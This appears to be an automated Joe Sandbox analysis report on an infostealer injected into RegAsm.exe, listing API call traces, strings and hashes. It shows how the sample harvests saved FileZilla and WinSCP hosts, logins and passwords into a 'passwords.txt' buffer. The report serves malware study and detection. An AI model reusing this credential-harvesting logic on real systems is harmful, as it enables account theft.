Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e76559eff6f24dd42f12c0e1004ca23433f9e9503ac318d2eb920aa3b4814f71
Instruction ID: 9c7d94cc24f2131212495383e86be6caa339bba534dadb3024ae17792b4b22c7
Opcode Fuzzy Hash: e76559eff6f24dd42f12c0e1004ca23433f9e9503ac318d2eb920aa3b4814f71
Instruction Fuzzy Hash: 18316DB6600341AFEF109F25EC85B167BEDEF94354F188828F9868B291E771E950CB61

Uniqueness

Uniqueness Score: -1.00%

Function 0040C050 Relevance: 93.4, APIs: 62, Instructions: 429memorystringCOMMON

Download Yara Rule

APIs

Part of subcall function 0040BF10: lstrlen.KERNEL32(75B65460,?,75B65460,00000000,?,0040C0A5,0040C8C0,?,0040C8C0,?,75B65460,00000000), ref: 0040BF5F
Part of subcall function 0040BF10: strchr.MSVCRT ref: 0040BF75

GetProcessHeap.KERNEL32(00000008,0040C8C0,?,75B65460,00000000,?,?,?,?,?,?,?,?,004215B1,000000FF), ref: 0040C0B1
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,004215B1,000000FF,?,0040C8C0,?,?,?), ref: 0040C0B8
GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,004215B1,000000FF,?,0040C8C0,?,?), ref: 0040C0CD
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,004215B1,000000FF,?,0040C8C0,?,?,?), ref: 0040C0D4
strcpy_s.MSVCRT ref: 0040C0F1
GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040C102
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004215B1), ref: 0040C109
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040C133
HeapFree.KERNEL32(00000000), ref: 0040C13A
GetProcessHeap.KERNEL32(00000008,0040C8C0), ref: 0040C146
HeapAlloc.KERNEL32(00000000), ref: 0040C14D
GetProcessHeap.KERNEL32(00000000,?), ref: 0040C162
HeapFree.KERNEL32(00000000), ref: 0040C169
strcpy_s.MSVCRT ref: 0040C18C
GetProcessHeap.KERNEL32(00000000,?), ref: 0040C19A
HeapFree.KERNEL32(00000000), ref: 0040C1A1
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040C1C0
HeapFree.KERNEL32(00000000), ref: 0040C1C7
GetProcessHeap.KERNEL32(00000008,0040C8C0), ref: 0040C1D3
HeapAlloc.KERNEL32(00000000), ref: 0040C1DA
GetProcessHeap.KERNEL32(00000000,?), ref: 0040C1EF
HeapFree.KERNEL32(00000000), ref: 0040C1F6
strcpy_s.MSVCRT ref: 0040C219
GetProcessHeap.KERNEL32(00000000,?), ref: 0040C227
HeapFree.KERNEL32(00000000), ref: 0040C22E
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040C256
HeapFree.KERNEL32(00000000), ref: 0040C25D
GetProcessHeap.KERNEL32(00000008,0040C8C0), ref: 0040C269
HeapAlloc.KERNEL32(00000000), ref: 0040C270
GetProcessHeap.KERNEL32(00000000,?), ref: 0040C285
HeapFree.KERNEL32(00000000), ref: 0040C28C
strcpy_s.MSVCRT ref: 0040C2AC
GetProcessHeap.KERNEL32(00000000,?), ref: 0040C2BD
HeapFree.KERNEL32(00000000), ref: 0040C2C4
lstrlen.KERNEL32(00000000), ref: 0040C2CB
GetProcessHeap.KERNEL32(00000008,00000001), ref: 0040C2DD
HeapAlloc.KERNEL32(00000000), ref: 0040C2E4
lstrlen.KERNEL32(00000000), ref: 0040C305

Part of subcall function 00411BD0: malloc.MSVCRT ref: 00411BE1
Part of subcall function 00411BD0: strncpy.MSVCRT ref: 00411BF1

strcpy_s.MSVCRT ref: 0040C32B
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040C342
HeapFree.KERNEL32(00000000), ref: 0040C349
lstrlen.KERNEL32(00000000), ref: 0040C350
GetProcessHeap.KERNEL32(00000008,00000001), ref: 0040C35F
HeapAlloc.KERNEL32(00000000), ref: 0040C366
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040C374
HeapFree.KERNEL32(00000000), ref: 0040C37B

Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9

strcpy_s.MSVCRT ref: 0040C397
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040C3A3
HeapFree.KERNEL32(00000000), ref: 0040C3AA
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040C3D7
HeapFree.KERNEL32(00000000), ref: 0040C3DE
GetProcessHeap.KERNEL32(00000008,0040C8C0), ref: 0040C3EA
HeapAlloc.KERNEL32(00000000), ref: 0040C3F1
strcpy_s.MSVCRT ref: 0040C407
GetProcessHeap.KERNEL32(00000000,?), ref: 0040C416
HeapFree.KERNEL32(00000000), ref: 0040C41D
lstrlen.KERNEL32(00000000,00000000,?,?,?), ref: 0040C491
lstrlen.KERNEL32(00000000,00000000), ref: 0040C4A1
GetProcessHeap.KERNEL32(00000000,?), ref: 0040C530
HeapFree.KERNEL32(00000000), ref: 0040C537

Memory Dump Source

Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$Process$Free$Allocstrcpy_s$lstrlen$lstrcpymallocstrchrstrncpy
String ID:
API String ID: 3662779188-0
Opcode ID: 94de16d627383293b9dc17cc193afd69119facb2a0f6166f012a74c18b98ba21
Instruction ID: b40cbd5fc23cbd84975b33a862b5865f3c8f674952f2fc639572ad373f1cfd8d
Opcode Fuzzy Hash: 94de16d627383293b9dc17cc193afd69119facb2a0f6166f012a74c18b98ba21
Instruction Fuzzy Hash: DFE16575900216EBCB14EBE0DC99EAF7B79FF49304F50552AFA02B3281DB385905CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0040CB59 Relevance: 66.8, APIs: 28, Strings: 10, Instructions: 295stringCOMMON

Download Yara Rule

APIs

StrStrA.SHLWAPI(00000000,<Host>), ref: 0040CB66
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040CB71

Part of subcall function 00411BD0: malloc.MSVCRT ref: 00411BE1
Part of subcall function 00411BD0: strncpy.MSVCRT ref: 00411BF1

Part of subcall function 0040FF60: lstrcpy.KERNEL32(00000000), ref: 0040FFA0

StrStrA.SHLWAPI(00000000,<Port>), ref: 0040CBA8
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040CBB3
StrStrA.SHLWAPI(00000000,<User>), ref: 0040CBF0
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040CBFB
StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 0040CC38
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040CC47
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040CCD3
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040CCEB
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040CD03
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040CD1B
lstrcat.KERNEL32(?,Soft: FileZilla), ref: 0040CD33
lstrcat.KERNEL32(?,Host: ), ref: 0040CD42
lstrcat.KERNEL32(?,00000000), ref: 0040CD55
lstrcat.KERNEL32(?,00427F1C), ref: 0040CD64
lstrcat.KERNEL32(?,00000000), ref: 0040CD77
lstrcat.KERNEL32(?,00427F20), ref: 0040CD86
lstrcat.KERNEL32(?,Login: ), ref: 0040CD95
lstrcat.KERNEL32(?,00000000), ref: 0040CDA8
lstrcat.KERNEL32(?,00427F2C), ref: 0040CDB7
lstrcat.KERNEL32(?,Password: ), ref: 0040CDC6
lstrcat.KERNEL32(?,00000000), ref: 0040CDD9
lstrcat.KERNEL32(?,00427F3C), ref: 0040CDE8
lstrcat.KERNEL32(?,00427F40), ref: 0040CDF7

Part of subcall function 0040FF10: lstrlen.KERNEL32(00418949,?,00000000,?,00417FAF,004283A3,004283A2,00000000,?,00000000,00423261,000000FF,?,00418949), ref: 0040FF1B
Part of subcall function 0040FF10: lstrcpy.KERNEL32(00000000,00418949), ref: 0040FF52

strtok_s.MSVCRT ref: 0040CE3B
lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040CE51
memset.MSVCRT ref: 0040CEA5

Strings

Host: , xrefs: 0040CD3C
<Pass encoding="base64">, xrefs: 0040CC32
Login: , xrefs: 0040CD8F
<User>, xrefs: 0040CBEA
Soft: FileZilla, xrefs: 0040CD2D
<Port>, xrefs: 0040CBA2
Password: , xrefs: 0040CDC0
<Host>, xrefs: 0040CB60
O{BN{BK{B, xrefs: 0040CE1C
passwords.txt, xrefs: 0040CE64

Memory Dump Source

Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrlen$lstrcpy$mallocmemsetstrncpystrtok_s
String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$Host: $Login: $O{BN{BK{B$Password: $Soft: FileZilla$passwords.txt
API String ID: 368316605-4044742749
Opcode ID: 2504489c83ee430403c3c6d527c3b242dbb672e54f4aa7bda098665578810373
Instruction ID: 003d06b88ee209d3646e7d5b0c8682ef30a99e174e8e8da48fb9cda7d86fbdc0
Opcode Fuzzy Hash: 2504489c83ee430403c3c6d527c3b242dbb672e54f4aa7bda098665578810373
Instruction Fuzzy Hash: F5B1B575904219AACB04EBA1DC56BEEBB78BF19304F50046EF501B3192DF786A48CB69

Uniqueness

Uniqueness Score: -1.00%

Function 00409460 Relevance: 58.0, APIs: 32, Strings: 1, Instructions: 297stringmemoryfileCOMMON

Download Yara Rule

APIs

Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9

Part of subcall function 0040FFB0: lstrcpy.KERNEL32(00000000), ref: 00410013
Part of subcall function 0040FFB0: lstrcat.KERNEL32(?,00000000), ref: 0041001F

Part of subcall function 0040FF60: lstrcpy.KERNEL32(00000000), ref: 0040FFA0

Part of subcall function 00410040: lstrlen.KERNEL32(?,?,?,?,?,?,00421D69,000000FF,?,004188B7,?,014532E8,?), ref: 0041007C
Part of subcall function 00410040: lstrcpy.KERNEL32(00000000), ref: 004100A7
Part of subcall function 00410040: lstrcat.KERNEL32(?,?), ref: 004100B1

SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,0000000A,?,?,?,?,00000000,00420CA3,000000FF,?,0040A951), ref: 00409579
GetFileSize.KERNEL32(00000000,00000000,?,0000000A,?,?,?,?,00000000,00420CA3,000000FF,?,0040A951), ref: 00409582
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,0000000A,?,?,?,?,00000000,00420CA3,000000FF,?,0040A951), ref: 00409591
??_U@YAPAXI@Z.MSVCRT ref: 0040959B
ReadFile.KERNEL32(00000000,00000000,00000000,00420CA3,00000000,?,?,0000000A,?,?,?,?,00000000,00420CA3,000000FF), ref: 004095AE
GetProcessHeap.KERNEL32(00000000,000F423F,?,?,0000000A,?,?,?,?,00000000,00420CA3,000000FF,?,0040A951), ref: 004095BB
HeapAlloc.KERNEL32(00000000,?,?,0000000A,?,?,?,?,00000000,00420CA3,000000FF,?,0040A951), ref: 004095C2
StrStrA.SHLWAPI(00000000,01461FC8,?,?,0000000A,?,?,?,?,00000000,00420CA3,000000FF,?,0040A951), ref: 004095D3
StrStrA.SHLWAPI(-00000010,01461E48,?,?,0000000A,?,?,?,?,00000000,00420CA3,000000FF,?,0040A951), ref: 004095EE
lstrcat.KERNEL32(000000FF,0145F650), ref: 00409604
lstrcat.KERNEL32(000000FF,00000000), ref: 00409617
lstrcat.KERNEL32(000000FF,00427C54), ref: 00409626
lstrcat.KERNEL32(000000FF,00000000), ref: 00409639
lstrcat.KERNEL32(000000FF,00427C58), ref: 00409648
lstrcat.KERNEL32(000000FF,0145F5C0), ref: 00409658
lstrcat.KERNEL32(000000FF,-00000010), ref: 00409663
lstrcat.KERNEL32(000000FF,00427C5C), ref: 00409672
StrStrA.SHLWAPI(-000000FE,014615F8,?,?,0000000A,?,?,?,?,00000000,00420CA3,000000FF,?,0040A951), ref: 00409683
StrStrA.SHLWAPI(00000014,01461538,?,?,0000000A,?,?,?,?,00000000,00420CA3,000000FF,?,0040A951), ref: 00409694
lstrcat.KERNEL32(000000FF,0145F5B0), ref: 004096AA

Part of subcall function 00409330: memset.MSVCRT ref: 00409359
Part of subcall function 00409330: lstrlen.KERNEL32(004096B6,00000001,?,00001FA0,00000000,00000000,?,004096B6), ref: 00409376
Part of subcall function 00409330: CryptStringToBinaryA.CRYPT32(004096B6,00000000,?,004096B6), ref: 0040937E
Part of subcall function 00409330: memcpy.MSVCRT ref: 004093F1

lstrcat.KERNEL32(000000FF,00000000), ref: 004096BE
lstrcat.KERNEL32(000000FF,00427C60), ref: 004096CD
StrStrA.SHLWAPI(-000000FE,01461538,?,?,?,0000000A,?,?,?,?,00000000,00420CA3,000000FF,?,0040A951), ref: 004096DE
StrStrA.SHLWAPI(00000014,0145F590,?,?,?,0000000A,?,?,?,?,00000000,00420CA3,000000FF,?,0040A951), ref: 004096EF
lstrcat.KERNEL32(000000FF,014620E8), ref: 00409705

Part of subcall function 00409330: lstrcat.KERNEL32(00427AA7,00427AAB), ref: 0040942D

lstrcat.KERNEL32(000000FF,00000000), ref: 00409719
lstrcat.KERNEL32(000000FF,00427C64), ref: 00409728
lstrcat.KERNEL32(000000FF,00427C68), ref: 00409737
StrStrA.SHLWAPI(-00000002,01461FC8,?,?,?,?,0000000A,?,?,?,?,00000000,00420CA3,000000FF,?,0040A951), ref: 00409748
lstrlen.KERNEL32(000000FF,?,?,0000000A,?,?,?,?,00000000,00420CA3,000000FF,?,0040A951), ref: 0040975C
memset.MSVCRT ref: 004097B1
CloseHandle.KERNEL32(00000000), ref: 004097BA

Strings

passwords.txt, xrefs: 0040976F

Memory Dump Source

Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$Filelstrcpy$lstrlen$HeapPointermemset$AllocBinaryCloseCryptHandleProcessReadSizeStringmemcpy
String ID: passwords.txt
API String ID: 2388354673-347816968
Opcode ID: 6eeb3c14f299bfd014cc7363a9c42ae89670ef8ad7f31e1185115eb00b0f37ef
Instruction ID: 0c1f35d45bd3c2b6c9383514b9817522ff8a3a891fab0831307e9c008aa627d4
Opcode Fuzzy Hash: 6eeb3c14f299bfd014cc7363a9c42ae89670ef8ad7f31e1185115eb00b0f37ef
Instruction Fuzzy Hash: 78B1C375900205EBDB10EBA0DC59FEE7BB9BF1A304F540519FA02A3291DF785A48CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0040C73E Relevance: 54.5, APIs: 22, Strings: 9, Instructions: 215stringregistryCOMMON

Download Yara Rule

APIs

lstrcat.KERNEL32(00421610,Soft: WinSCP), ref: 0040C74C
lstrcat.KERNEL32(00421610,Host: ), ref: 0040C75B
RegGetValueA.ADVAPI32(000000FF,?,HostName,00000002,00000000,?,?), ref: 0040C77F
lstrcat.KERNEL32(00421610,?), ref: 0040C78C
RegGetValueA.ADVAPI32(000000FF,?,PortNumber,0000FFFF,00000000,?,?), ref: 0040C7B7
lstrcat.KERNEL32(00421610,00000000), ref: 0040C7DD
lstrcat.KERNEL32(00421610,:22), ref: 0040C7F9
lstrcat.KERNEL32(00421610,00427E4C), ref: 0040C808
lstrcat.KERNEL32(00421610,Login: ), ref: 0040C817
RegGetValueA.ADVAPI32(000000FF,?,UserName,00000002,00000000,?,?), ref: 0040C83B
lstrcat.KERNEL32(00421610,?), ref: 0040C848
lstrcat.KERNEL32(00421610,00427E64), ref: 0040C857
RegGetValueA.ADVAPI32(000000FF,?,Password,00000002,00000000,?,?), ref: 0040C87B
lstrcat.KERNEL32(00421610,Password: ), ref: 0040C886
StrCmpCA.SHLWAPI(?,00427B3E), ref: 0040C898
lstrcat.KERNEL32(00421610,00000000), ref: 0040C8D3
lstrcat.KERNEL32(00421610,00427E80), ref: 0040C8ED
lstrcat.KERNEL32(00421610,00427E84), ref: 0040C8FC
RegEnumKeyExA.ADVAPI32(000000FF,00000001,?,00000104,00000000,00000000,00000000,00000000), ref: 0040C921

Part of subcall function 00411C10: wsprintfA.USER32 ref: 00411C2B

memset.MSVCRT ref: 0040C932
memset.MSVCRT ref: 0040C940
lstrlen.KERNEL32(00421610), ref: 0040C958
memset.MSVCRT ref: 0040C9AB

Strings

HostName, xrefs: 0040C772
Password, xrefs: 0040C86E
Soft: WinSCP, xrefs: 0040C746
PortNumber, xrefs: 0040C7A3
Password: , xrefs: 0040C880
passwords.txt, xrefs: 0040C96B
Host: , xrefs: 0040C755
UserName, xrefs: 0040C82E
Login: , xrefs: 0040C811

Memory Dump Source

Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$Value$memset$Enumlstrlenwsprintf
String ID: Host: $HostName$Login: $Password$Password: $PortNumber$Soft: WinSCP$UserName$passwords.txt
API String ID: 2902345061-4040920679
Opcode ID: 4cf30f45a6693c620ec2a003ab5cbf899c03944fa43ca4557fde33857f9d223c
Instruction ID: 15f759088607e9964790177d35be8adeac096382de0593ff92e4df6e6086aa5c
Opcode Fuzzy Hash: 4cf30f45a6693c620ec2a003ab5cbf899c03944fa43ca4557fde33857f9d223c
Instruction Fuzzy Hash: 17717FB1D0021AABCB04DBE4DC95EFFB779EB48304F50455AF615A3180D6785E488B74

Uniqueness

Uniqueness Score: -1.00%

Function 19CE9120 Relevance: 45.9, APIs: 23, Strings: 3, Instructions: 355COMMON

Download Yara Rule

Strings

_node, xrefs: 19CE9202
,%s, xrefs: 19CE9297
CREATE TABLE x(_shape, xrefs: 19CE9268

Memory Dump Source

Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true

Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd

Similarity

API ID:
String ID: ,%s$CREATE TABLE x(_shape$_node
API String ID: 0-1242591684
Opcode ID: c771822f666aee86e0508096e670a8d81ec99076aa20940af82102bf3fa277b4
Instruction ID: 079ea6fdc7c72845027d77250a95b625b25c8569b231e15b8344e9b7672a3ffd
Opcode Fuzzy Hash: c771822f666aee86e0508096e670a8d81ec99076aa20940af82102bf3fa277b4
Instruction Fuzzy Hash: 52C11476A00341DBD7129F74EC89B97BBF4BF44344F188128E98A87392DB36E415CB62

Uniqueness

Uniqueness Score: -1.00%

Function 19D9B050 Relevance: 38.8, APIs: 10, Strings: 12, Instructions: 251COMMON

Download Yara Rule

Strings

%c%u, xrefs: 19D9B2C3
vtab:%p, xrefs: 19D9B283
,%s%s%s, xrefs: 19D9B137
BINARY, xrefs: 19D9B0D3
%.18s-%s, xrefs: 19D9B192
NULL, xrefs: 19D9B267, 19D9B324, 19D9B325
%lld, xrefs: 19D9B1DA, 19D9B24C
%.16g, xrefs: 19D9B217
%s(%d), xrefs: 19D9B1B3
k(%d, xrefs: 19D9B0A5
program, xrefs: 19D9B2FB
(blob), xrefs: 19D9B26C

Memory Dump Source

Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true

Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd

Similarity

API ID:
String ID: %.16g$%.18s-%s$%c%u$%lld$%s(%d)$(blob)$,%s%s%s$BINARY$NULL$k(%d$program$vtab:%p
API String ID: 0-900822179
Opcode ID: cd9d341a8164b5ebb1497b995268acb807072c30ffb34fc3fa5d5112c5199674
Instruction ID: ff4d1f8e2a4473b73c5af7e918a2e2315c660bda2c5a9b56348e421e77089424
Opcode Fuzzy Hash: cd9d341a8164b5ebb1497b995268acb807072c30ffb34fc3fa5d5112c5199674
Instruction Fuzzy Hash: E891F674A183059FDB04EF54C881B6B77E5BF81304FDD8849E8C99B653E73AE8068B91

Uniqueness

Uniqueness Score: -1.00%

Function 19C5D820 Relevance: 35.2, APIs: 8, Strings: 12, Instructions: 223COMMON

Download Yara Rule

Strings

fts3tokenize, xrefs: 19C5DA27
fts4aux, xrefs: 19C5D840
optimize, xrefs: 19C5D9A4
snippet, xrefs: 19C5D93C
offsets, xrefs: 19C5D956
matchinfo, xrefs: 19C5D970, 19C5D98A
unicode61, xrefs: 19C5D90B
fts3, xrefs: 19C5D9CA
fts4, xrefs: 19C5D9F0
simple, xrefs: 19C5D8A9
fts3_tokenizer, xrefs: 19C5D921
porter, xrefs: 19C5D8EE

Memory Dump Source

Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true

Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd

Similarity

API ID:
String ID: fts3$fts3_tokenizer$fts3tokenize$fts4$fts4aux$matchinfo$offsets$optimize$porter$simple$snippet$unicode61
API String ID: 0-449611708
Opcode ID: 85c2aca7498f827e5a586ddaae48b109a8ac3e545ca955c0bc211be1aa3c5a8c
Instruction ID: ad995360abd6b65b7ad12e98ec41c0b36e7754aa0b374e3e7c0cdbcf857fb10d
Opcode Fuzzy Hash: 85c2aca7498f827e5a586ddaae48b109a8ac3e545ca955c0bc211be1aa3c5a8c
Instruction Fuzzy Hash: 5A517A75F0031167F611BA65FC85F9B3AA8AF01759F0C4034FD8AA6282E765E706C2A6

Uniqueness

Uniqueness Score: -1.00%

Function 19DD7FB0 Relevance: 33.6, APIs: 14, Strings: 5, Instructions: 342COMMON

Download Yara Rule

Strings

